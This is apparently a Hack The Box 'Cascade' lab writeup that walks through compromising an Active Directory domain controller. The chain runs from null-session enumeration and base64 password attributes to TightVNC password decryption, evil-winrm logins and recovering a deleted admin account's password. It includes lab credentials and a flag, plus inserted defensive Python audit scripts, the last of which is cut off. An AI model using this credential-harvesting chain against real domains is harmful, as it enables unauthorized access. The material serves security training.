CASCADE WRITEUP

NMAP SCANS


    Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-25 15:37 IST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 15:37
    Completed NSE at 15:37, 0.00s elapsed
    Initiating NSE at 15:37
    Completed NSE at 15:37, 0.00s elapsed
    Initiating NSE at 15:37
    Completed NSE at 15:37, 0.00s elapsed
    Initiating Ping Scan at 15:37
    Scanning 10.10.10.182 [4 ports]
    Completed Ping Scan at 15:37, 0.66s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 15:37
    Completed Parallel DNS resolution of 1 host. at 15:37, 0.36s elapsed
    Initiating SYN Stealth Scan at 15:37
    Scanning 10.10.10.182 [1000 ports]
    Discovered open port 53/tcp on 10.10.10.182
    Discovered open port 139/tcp on 10.10.10.182
    Discovered open port 445/tcp on 10.10.10.182
    Discovered open port 135/tcp on 10.10.10.182
    Discovered open port 49157/tcp on 10.10.10.182
    Discovered open port 49158/tcp on 10.10.10.182
    Discovered open port 636/tcp on 10.10.10.182
    Discovered open port 49165/tcp on 10.10.10.182
    Discovered open port 3268/tcp on 10.10.10.182
    Discovered open port 3269/tcp on 10.10.10.182
    Discovered open port 389/tcp on 10.10.10.182
    Discovered open port 49155/tcp on 10.10.10.182
    Discovered open port 88/tcp on 10.10.10.182
    Discovered open port 49154/tcp on 10.10.10.182
    Completed SYN Stealth Scan at 15:38, 26.61s elapsed (1000 total ports)
    Initiating Service scan at 15:38
    Scanning 14 services on 10.10.10.182
    Completed Service scan at 15:39, 60.12s elapsed (14 services on 1 host)
    Initiating OS detection (try #1) against 10.10.10.182
    Retrying OS detection (try #2) against 10.10.10.182
    Initiating Traceroute at 15:39
    Completed Traceroute at 15:39, 0.43s elapsed
    Initiating Parallel DNS resolution of 2 hosts. at 15:39
    Completed Parallel DNS resolution of 2 hosts. at 15:39, 0.40s elapsed
    NSE: Script scanning 10.10.10.182.
    Initiating NSE at 15:39
    Completed NSE at 15:40, 40.10s elapsed
    Initiating NSE at 15:40
    Completed NSE at 15:42, 122.25s elapsed
    Initiating NSE at 15:42
    Completed NSE at 15:42, 0.00s elapsed
    Nmap scan report for 10.10.10.182
    Host is up (0.36s latency).
    Not shown: 986 filtered ports
    PORT      STATE SERVICE       VERSION
    53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
    | dns-nsid: 
    |_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
    88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-06-25 10:13:22Z)
    135/tcp   open  msrpc         Microsoft Windows RPC
    139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
    389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
    445/tcp   open  microsoft-ds?
    636/tcp   open  tcpwrapped
    3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
    3269/tcp  open  tcpwrapped
    49154/tcp open  msrpc         Microsoft Windows RPC
    49155/tcp open  msrpc         Microsoft Windows RPC
    49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
    49158/tcp open  msrpc         Microsoft Windows RPC
    49165/tcp open  msrpc         Microsoft Windows RPC
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose|phone|specialized
    Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
    OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
    Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
    No exact OS matches for host (test conditions non-ideal).
    Uptime guess: 0.254 days (since Thu Jun 25 09:36:50 2020)
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=262 (Good luck!)
    IP ID Sequence Generation: Incremental
    Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

    Host script results:
    |_clock-skew: 5m01s
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled and required
    | smb2-time: 
    |   date: 2020-06-25T10:14:28
    |_  start_date: 2020-06-25T04:12:26

    TRACEROUTE (using port 53/tcp)
    HOP RTT       ADDRESS
    1   411.99 ms 10.10.14.1
    2   411.97 ms 10.10.10.182

    NSE: Script Post-scanning.
    Initiating NSE at 15:42
    Completed NSE at 15:42, 0.00s elapsed
    Initiating NSE at 15:42
    Completed NSE at 15:42, 0.00s elapsed
    Initiating NSE at 15:42
    Completed NSE at 15:42, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 259.33 seconds
            Raw packets sent: 2085 (95.424KB) | Rcvd: 71 (5.040KB)

ENUMERATION PART

SMB ANONYMOUS LOGIN ENUMERATION:


    ┌─[root@liquid]─[~/Desktop/HTB/cascadeC]
    └──╼ #smbclient -L 10.10.10.182
    Enter WORKGROUP\root's password: 
    Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
    SMB1 disabled -- no workgroup available

RPCCLIENT NULL SESSION ENUMERATION:


    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/cascadeC]
    └──╼ #rpcclient -U "" 10.10.10.182
    Enter WORKGROUP\'s password: 
    rpcclient $> enum
    enumalsgroups      enumdomains        enumdrivers        enumkey            enumprinters       enumprocs          
    enumdata           enumdomgroups      enumforms          enummonitors       enumprivs          enumtrust          
    enumdataex         enumdomusers       enumjobs           enumports          enumprocdatatypes  
    rpcclient $> enumdomains 
    name:[CASCADE] idx:[0x0]
    name:[Builtin] idx:[0x0]
    rpcclient $> enumdomusers 
    user:[CascGuest] rid:[0x1f5]
    user:[arksvc] rid:[0x452]
    user:[s.smith] rid:[0x453]
    user:[r.thompson] rid:[0x455]
    user:[util] rid:[0x457]
    user:[j.wakefield] rid:[0x45c]
    user:[s.hickson] rid:[0x461]
    user:[j.goodhand] rid:[0x462]
    user:[a.turnbull] rid:[0x464]
    user:[e.crowe] rid:[0x467]
    user:[b.hanson] rid:[0x468]
    user:[d.burman] rid:[0x469]
    user:[BackupSvc] rid:[0x46a]
    user:[j.allen] rid:[0x46e]
    user:[i.croft] rid:[0x46f]
    rpcclient $> enumdomgroups 
    group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
    group:[Domain Users] rid:[0x201]
    group:[Domain Guests] rid:[0x202]
    group:[Domain Computers] rid:[0x203]
    group:[Group Policy Creator Owners] rid:[0x208]
    group:[DnsUpdateProxy] rid:[0x44f]
    rpcclient $> 

Here, through a null session, we obtained the domain names, the domain users and the domain groups.

LDAP ENUMERATION:

    nmap -p 389 --script "ldap-*" 10.10.10.182


    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/cascadeC]
    └──╼ #ldapsearch -h 10.10.10.182 -x -s sub -b "DC=cascade,DC=local"
    # Ryan Thompson, Users, UK, cascade.local
    dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
    objectClass: top
    objectClass: person
    objectClass: organizationalPerson
    objectClass: user
    cn: Ryan Thompson
    sn: Thompson
    givenName: Ryan
    distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
    instanceType: 4
    whenCreated: 20200109193126.0Z
    whenChanged: 20200323112031.0Z
    displayName: Ryan Thompson
    uSNCreated: 24610
    memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
    uSNChanged: 295010
    name: Ryan Thompson
    objectGUID:: LfpD6qngUkupEy9bFXBBjA==
    userAccountControl: 66048
    badPwdCount: 0
    codePage: 0
    countryCode: 0
    badPasswordTime: 132247339091081169
    lastLogoff: 0
    lastLogon: 132247339125713230
    pwdLastSet: 132230718862636251
    primaryGroupID: 513
    objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
    accountExpires: 9223372036854775807
    logonCount: 2
    sAMAccountName: r.thompson
    sAMAccountType: 805306368
    userPrincipalName: r.thompson@cascade.local
    objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
    dSCorePropagationData: 20200126183918.0Z
    dSCorePropagationData: 20200119174753.0Z
    dSCorePropagationData: 20200119174719.0Z
    dSCorePropagationData: 20200119174508.0Z
    dSCorePropagationData: 16010101000000.0Z
    lastLogonTimestamp: 132294360317419816
    msDS-SupportedEncryptionTypes: 0
    cascadeLegacyPwd: clk0bjVldmE=

Here we have a password stored base64-encoded in the custom attribute cascadeLegacyPwd: clk0bjVldmE= decodes to rY4n5eva.

ENUMERATION AFTER LOGINS

So far we have a list of users and a password for the user r.thompson (Ryan):

I will try this password with smbclient and evil-winrm:

RYAN : SMBCLIENT



    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/cascadeC]
    └──╼ #smbclient -U "r.thompson" -L 10.10.10.182
    Enter WORKGROUP\r.thompson's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        Audit$          Disk      
        C$              Disk      Default share
        Data            Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        print$          Disk      Printer Drivers
        SYSVOL          Disk      Logon server share 
    SMB1 disabled -- no workgroup available
    ┌─[root@liquid]─[~/Desktop/HTB/cascadeC]
    └──╼ #

RYAN : EVIL-WINRM

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/cascadeC]
    └──╼ #evil-winrm -u r.thompson -p rY4n5eva -i 10.10.10.182

    Evil-WinRM shell v2.3

    Info: Establishing connection to remote endpoint

    Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

    Error: Exiting with code 1

WinRM login failed for r.thompson, so we fall back to SMB and try to pull more data from the shares.

We download everything we can read from the Data share:


    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/cascade]
    └──╼ #smbclient -U 'r.thompson' \\\\10.10.10.182\\Data 
    Enter WORKGROUP\r.thompson's password: 
    Try "help" to get a list of possible commands.
    smb: \> ls
    .                                   D        0  Mon Jan 27 08:57:34 2020
    ..                                  D        0  Mon Jan 27 08:57:34 2020
    Contractors                         D        0  Mon Jan 13 07:15:11 2020
    Finance                             D        0  Mon Jan 13 07:15:06 2020
    IT                                  D        0  Tue Jan 28 23:34:51 2020
    Production                          D        0  Mon Jan 13 07:15:18 2020
    Temps                               D        0  Mon Jan 13 07:15:15 2020
    cd Co
            13106687 blocks of size 4096. 7798117 blocks available
    smb: \> cd IT
    smb: \IT\> recurse ON
    smb: \IT\> mget *
    Get directory Email Archives? yes
    Get file Meeting_Notes_June_2018.html? yes
    getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as Meeting_Notes_June_2018.html (1.0 KiloBytes/sec) (average 1.0 KiloBytes/sec)
    Get directory LogonAudit? yes
    Get directory Logs? yes
    Get directory Ark AD Recycle Bin? yes
    Get file ArkAdRecycleBin.log? yes
    getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as ArkAdRecycleBin.log (0.6 KiloBytes/sec) (average 0.8 KiloBytes/sec)
    yeGet directory DCs?yes
    Get file dcdiag.log? yes
    getting file \IT\Logs\DCs\dcdiag.log of size 5967 as dcdiag.log (2.8 KiloBytes/sec) (average 1.4 KiloBytes/sec)
    yes
    Get directory Temp? yesGet directory r.thompson? 
    yes
    Get directory s.smith? yGet file VNC Install.reg? es
    getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as VNC Install.reg (2.0 KiloBytes/sec) (average 1.5 KiloBytes/sec)
    yes

We downloaded every file under IT; the remaining folders were not readable with this account.

The Email Archives folder contains an HTML file, Meeting_Notes_June_2018.html, which looks suspicious.

Next, the .reg file found in s.smith's Temp directory is a TightVNC server export and contains a password in hex form:


    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]

    [HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
    "ExtraPorts"=""
    "QueryTimeout"=dword:0000001e
    "QueryAcceptOnTimeout"=dword:00000000
    "LocalInputPriorityTimeout"=dword:00000003
    "LocalInputPriority"=dword:00000000
    "BlockRemoteInput"=dword:00000000
    "BlockLocalInput"=dword:00000000
    "IpAccessControl"=""
    "RfbPort"=dword:0000170c
    "HttpPort"=dword:000016a8
    "DisconnectAction"=dword:00000000
    "AcceptRfbConnections"=dword:00000001
    "UseVncAuthentication"=dword:00000001
    "UseControlAuthentication"=dword:00000000
    "RepeatControlAuthentication"=dword:00000000
    "LoopbackOnly"=dword:00000000
    "AcceptHttpConnections"=dword:00000001
    "LogLevel"=dword:00000000
    "EnableFileTransfers"=dword:00000001
    "RemoveWallpaper"=dword:00000001
    "UseD3D"=dword:00000001
    "UseMirrorDriver"=dword:00000001
    "EnableUrlParams"=dword:00000001
    "Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
    "AlwaysShared"=dword:00000000
    "NeverShared"=dword:00000000
    "DisconnectClients"=dword:00000001
    "PollingInterval"=dword:000003e8
    "AllowLoopback"=dword:00000000
    "VideoRecognitionInterval"=dword:00000bb8
    "GrabTransparentWindows"=dword:00000001
    "SaveLogToAllUsersPath"=dword:00000000
    "RunControlInterface"=dword:00000001
    "IdleTimeout"=dword:00000000
    "VideoClasses"=""
    "VideoRects"=""

"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f

To decrypt this (TightVNC stores the password DES-encrypted with a fixed, publicly known key, so the hex bytes are effectively plaintext): https://github.com/frizb/PasswordDecrypts

s.smith : 6bcf2a4b6e5aca0f : sT333ve2
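As an added example (not part of the original writeup), the check below parses a .reg export like the one above and flags TightVNC credential values, whose hex bytes are recoverable because of the fixed DES key. The embedded sample is a constructed, abbreviated copy of the file shown; only "Password" appears in the writeup, and the PasswordViewOnly/ControlPassword names are assumed additions.

```python
import re

# Constructed sample input: an abbreviated copy of the TightVNC server export
# (VNC Install.reg) found on the share in the writeup.
REG_SAMPLE = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"RfbPort"=dword:0000170c
"UseVncAuthentication"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AllowLoopback"=dword:00000000
"""

# TightVNC keeps the RFB password DES-encrypted under a fixed, publicly known
# key, so any of these values in an exported .reg file is as good as plaintext.
# Only "Password" appears in the writeup; the other two names are TightVNC's
# view-only and control-interface passwords (assumed here, not from the page).
TIGHTVNC_SECRET_VALUES = {"Password", "PasswordViewOnly", "ControlPassword"}

SECTION_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"([^"]+)"=(.*)$')


def decode_value(data):
    """Turn the right-hand side of a .reg value line into (kind, python_value)."""
    if data.startswith("dword:"):
        return "dword", int(data[len("dword:"):], 16)
    if data.startswith("hex"):            # "hex:" or typed "hex(b):" variants
        body = data.split(":", 1)[1]
        return "hex", bytes(int(b, 16) for b in body.split(",") if b.strip())
    if len(data) >= 2 and data[0] == data[-1] == '"':
        return "sz", data[1:-1]
    return "raw", data


def parse_reg(text):
    """Parse a .reg export into {key_path: {value_name: (kind, value)}}.
    Hex values that regedit wraps with a trailing backslash are re-joined."""
    result, current = {}, None
    lines = iter(text.splitlines())
    for raw in lines:
        line = raw.strip()
        while line.endswith("\\"):        # continuation of a long hex value
            line = line[:-1] + next(lines, "").strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1)
            result.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            result[current][m.group(1)] = decode_value(m.group(2))
    return result


def find_reversible_secrets(reg):
    """Return [(key_path, value_name, hex_bytes)] for TightVNC credential
    values present in the export; an empty list means nothing to rotate."""
    findings = []
    for key, values in reg.items():
        if "tightvnc" not in key.lower():
            continue
        for name, (kind, value) in values.items():
            if name in TIGHTVNC_SECRET_VALUES and kind == "hex" and value:
                findings.append((key, name, value.hex()))
    return findings


if __name__ == "__main__":
    for key, name, hexbytes in find_reversible_secrets(parse_reg(REG_SAMPLE)):
        print(f"{key}\\{name} holds a recoverable VNC password: {hexbytes}")
```

Any hit means the VNC password should be rotated and the export removed from the share, since the bytes alone are enough to recover it.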

GETTING USER ACCESS


    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/cascade]
    └──╼ #evil-winrm -u s.smith -p sT333ve2 -i 10.10.10.182

    Evil-WinRM shell v2.3

    Info: Establishing connection to remote endpoint

    *Evil-WinRM* PS C:\Users\s.smith\Documents> ls
    *Evil-WinRM* PS C:\Users\s.smith\Documents> cd ..
    *Evil-WinRM* PS C:\Users\s.smith> cd Desktop
    *Evil-WinRM* PS C:\Users\s.smith\Desktop> dir


        Directory: C:\Users\s.smith\Desktop


    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    -ar---        6/25/2020   5:16 AM             34 user.txt
    -a----        3/25/2020  11:17 AM           1031 WinDirStat.lnk


    *Evil-WinRM* PS C:\Users\s.smith\Desktop> type user.txt
    ed6c4b7931a5cb041cc4c5090a1efdca
    *Evil-WinRM* PS C:\Users\s.smith\Desktop> whoami /priv

    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name                Description                    State
    ============================= ============================== =======
    SeMachineAccountPrivilege     Add workstations to domain     Enabled
    SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
    SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
    *Evil-WinRM* PS C:\Users\s.smith\Desktop> whoami /all

    USER INFORMATION
    ----------------

    User Name       SID
    =============== ==============================================
    cascade\s.smith S-1-5-21-3332504370-1206983947-1165150453-1107


    GROUP INFORMATION
    -----------------

    Group Name                                  Type             SID                                            Attributes
    =========================================== ================ ============================================== ===============================================================
    Everyone                                    Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
    BUILTIN\Users                               Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
    BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\This Organization              Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
    CASCADE\Data Share                          Alias            S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group
    CASCADE\Audit Share                         Alias            S-1-5-21-3332504370-1206983947-1165150453-1137 Mandatory group, Enabled by default, Enabled group, Local Group
    CASCADE\IT                                  Alias            S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group
    CASCADE\Remote Management Users             Alias            S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group
    NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
    Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name                Description                    State
    ============================= ============================== =======
    SeMachineAccountPrivilege     Add workstations to domain     Enabled
    SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
    SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
    *Evil-WinRM* PS C:\Users\s.smith\Desktop> 

Here we have the user flag.

whoami /all shows only the default privileges, and the group memberships are the BUILTIN groups plus CASCADE\Data Share, Audit Share, IT and Remote Management Users:

So let's check the remaining files pulled from SMB:

I checked the file ArkAdRecycleBin.log, and here is what it contains:


    1/10/2018 15:43	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
    1/10/2018 15:43	[MAIN_THREAD]	Validating settings...
    1/10/2018 15:43	[MAIN_THREAD]	Error: Access is denied
    1/10/2018 15:43	[MAIN_THREAD]	Exiting with error code 5
    2/10/2018 15:56	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
    2/10/2018 15:56	[MAIN_THREAD]	Validating settings...
    2/10/2018 15:56	[MAIN_THREAD]	Running as user CASCADE\ArkSvc
    2/10/2018 15:56	[MAIN_THREAD]	Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
    2/10/2018 15:56	[MAIN_THREAD]	Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
    2/10/2018 15:56	[MAIN_THREAD]	Exiting with error code 0	
    8/12/2018 12:22	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
    8/12/2018 12:22	[MAIN_THREAD]	Validating settings...
    8/12/2018 12:22	[MAIN_THREAD]	Running as user CASCADE\ArkSvc
    8/12/2018 12:22	[MAIN_THREAD]	Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
    8/12/2018 12:22	[MAIN_THREAD]	Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
    8/12/2018 12:22	[MAIN_THREAD]	Exiting with error code 0

So there is a service account, CASCADE\ArkSvc, that runs the AD Recycle Bin manager and has been moving objects (TempAdmin among them) into the AD recycle bin:

The user list from rpcclient also contains arksvc, so the next step is probably to find that account's password.

From the Audit$ share we have an SQLite database, Audit.db; it is binary, but running strings against it reveals readable text:


    ┌─[root@liquid]─[~/Desktop/HTB/cascade]
    └──╼ #strings Audit.db 
    SQLite format 3


    <---->



    j.allenJoseph Allen
    BackupSvcBackupSvc
    d.burmanDavid Burman
    b.hans
    ?dddddddd
    DEL:f9bfa86b-d7ab-4561-b4b3-dbb1edb51f49CN=dddd\0ADEL:f9bfa86b-d7ab-4561-b4b3-dbb1edb51f49,CN=Deleted Objects,DC=cascade,DC=local
    ITempAdminTempAdmin
    DEL:5ea231a1-5bb4-4917-b07a-75a57f4c188aCN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local
    ?tempTemp
    DEL:83cb74b3-2958-45d0-90f0-72d46a4abddcCN=Temp\0ADEL:83cb74b3-2958-45d0-90f0-72d46a4abddc,CN=Deleted Objects,DC=cascade,DC=local
    Mdeleteddeleted guy
    DEL:8cfe6d14-caba-4ec0-9d3e-28468d12deefCN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local
    ?testTest
    DEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6dCN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
    ='ArkSvcBQO5l5Kj9MdErXx6Q6AGOw==cascade.local
    sqlb_temp_table_
    DeletedUserAudit
    Ldap
    dddddddd
    DEL:f9bfa86b-d7ab-45
    dddddddd

    <------>

Here we see, next to ArkSvc, text that looks like a hash, so let's decode it:

To decode the above text: https://dotnetfiddle.net/G2eVVb

arksvc : BQO5l5Kj9MdErXx6Q6AGOw== : w3lc0meFr31nd


    ┌─[root@liquid]─[~/Desktop/HTB/cascade]
    └──╼ #evil-winrm -u arksvc -p w3lc0meFr31nd -i 10.10.10.182

    Evil-WinRM shell v2.3

    Info: Establishing connection to remote endpoint

    *Evil-WinRM* PS C:\Users\arksvc\Documents> cd ../Desktop
    *Evil-WinRM* PS C:\Users\arksvc\Desktop> whoami /all

    USER INFORMATION
    ----------------

    User Name      SID
    ============== ==============================================
    cascade\arksvc S-1-5-21-3332504370-1206983947-1165150453-1106


    GROUP INFORMATION
    -----------------

    Group Name                                  Type             SID                                            Attributes
    =========================================== ================ ============================================== ===============================================================
    Everyone                                    Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
    BUILTIN\Users                               Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
    BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\This Organization              Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
    CASCADE\Data Share                          Alias            S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group
    CASCADE\IT                                  Alias            S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group
    CASCADE\AD Recycle Bin                      Alias            S-1-5-21-3332504370-1206983947-1165150453-1119 Mandatory group, Enabled by default, Enabled group, Local Group
    CASCADE\Remote Management Users             Alias            S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group
    NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
    Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name                Description                    State
    ============================= ============================== =======
    SeMachineAccountPrivilege     Add workstations to domain     Enabled
    SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
    SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Here we see that arksvc is a member of CASCADE\AD Recycle Bin, which grants the right to read deleted objects.

So we can read deleted AD objects back out of the recycle bin.

s.smith and arksvc have roughly the same privileges, but only arksvc has the AD Recycle Bin membership!

To recover the deleted objects I used the following references:

https://www.poweradmin.com/blog/restoring-deleted-objects-from-active-directory-using-ad-recycle-bin/

https://www.lepide.com/how-to/restore-deleted-objects-in-active-directory.html#:~:text=Navigate%20to%20start%20and%20type,to%20restore%20the%20deleted%20objects.

Querying the Active Directory Recycle Bin:


    *Evil-WinRM* PS C:\Users\arksvc\Desktop> Get-ADObject -ldapFilter:"(msDS-LastKnownRDN=*)" -IncludeDeletedObjects



    Deleted           : True
    DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
    Name              : TempAdmin
                        DEL:f0cc344d-31e0-4866-bceb-a842791ca059
    ObjectClass       : user
    ObjectGUID        : f0cc344d-31e0-4866-bceb-a842791ca059



    *Evil-WinRM* PS C:\Users\arksvc\Desktop> Get-ADObject -filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *

    <---->


    uSNChanged                      : 196700
    uSNCreated                      : 196690
    whenChanged                     : 1/26/2020 2:40:52 AM
    whenCreated                     : 1/26/2020 2:34:31 AM

    accountExpires                  : 9223372036854775807
    badPasswordTime                 : 0
    badPwdCount                     : 0
    CanonicalName                   : cascade.local/Deleted Objects/TempAdmin
                                    DEL:f0cc344d-31e0-4866-bceb-a842791ca059
    cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
    CN                              : TempAdmin
                                    DEL:f0cc344d-31e0-4866-bceb-a842791ca059
    codePage                        : 0
    countryCode                     : 0
    Created                         : 1/27/2020 3:23:08 AM
    createTimeStamp                 : 1/27/2020 3:23:08 AM
    Deleted                         : True

    <---->

The deleted TempAdmin object also carries cascadeLegacyPwd: YmFDVDNyMWFOMDBkbGVz decodes (base64) to baCT3r1aN00dles, which turns out to be the Administrator password as well.
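As an added example (not part of the original writeup), the script below audits directory dumps in both formats seen here, the ldapsearch LDIF for r.thompson and the Get-ADObject output for the deleted TempAdmin object, for custom attributes such as cascadeLegacyPwd that carry a base64-encoded readable string. The samples are constructed, abbreviated copies of those two dumps; the list of credential-like name fragments is an assumption of this example.

```python
import base64
import re

# Substrings that make an attribute name worth inspecting regardless of its value
# (assumed list for this example).
SENSITIVE_NAME_PARTS = ("pwd", "pass", "secret", "cred", "legacy")

# Constructed sample input: abbreviated copies of the two object dumps in the
# writeup, one in ldapsearch LDIF form and one in Get-ADObject console form.
LDIF_SAMPLE = """\
# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: user
sAMAccountName: r.thompson
objectGUID:: LfpD6qngUkupEy9bFXBBjA==
userAccountControl: 66048
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=
"""

PS_SAMPLE = """\
CanonicalName                   : cascade.local/Deleted Objects/TempAdmin
                                DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
CN                              : TempAdmin
                                DEL:f0cc344d-31e0-4866-bceb-a842791ca059
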